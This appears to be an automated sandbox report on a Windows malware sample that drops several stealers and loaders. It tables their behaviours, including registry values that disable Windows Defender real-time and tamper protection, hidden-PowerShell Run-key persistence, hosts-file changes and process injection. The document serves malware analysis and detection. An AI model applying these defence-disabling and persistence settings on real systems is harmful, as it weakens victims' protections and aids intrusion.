Analysis Overview
SHA256
5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0
Threat Level: Known bad
The file 5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0 was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
RedLine
ZGRat
DcRat
Modifies Windows Defender Real-time Protection settings
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Raccoon Stealer payload
Raccoon
Glupteba payload
SmokeLoader
RedLine payload
Glupteba
Downloads MZ/PE file
Drops file in Drivers directory
Modifies Windows Firewall
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Windows security modification
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 09:08
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 09:08
Reported
2023-10-26 09:11
Platform
win10v2004-20231023-en
Max time kernel
96s
Max time network
157s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 5648 created 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F3A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\88AC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4F0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hW6pu6vt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\4532.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\8725.exe'\"" | C:\Users\Admin\AppData\Local\Temp\8725.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2620 set thread context of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3452 set thread context of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3564 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 5820 set thread context of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3248 set thread context of 5900 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 4240 set thread context of 1508 | N/A | C:\Users\Admin\AppData\Local\Temp\A4F0.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files (x86)\Drive Tools\is-KHOCV.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-QFFOU.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-987R3.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-E4G1J.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2P3C7.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2O18J.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-A7GGR.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-VV009.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-UTO9D.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CLEF9.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-J2OSP.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-0N1MV.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-4T2MS.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-AMF2J.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-DITDB.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-E3QTU.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-MMSQH.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-GDBKB.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-C43AH.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-KTTVU.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-RO3IL.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\4F3A.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
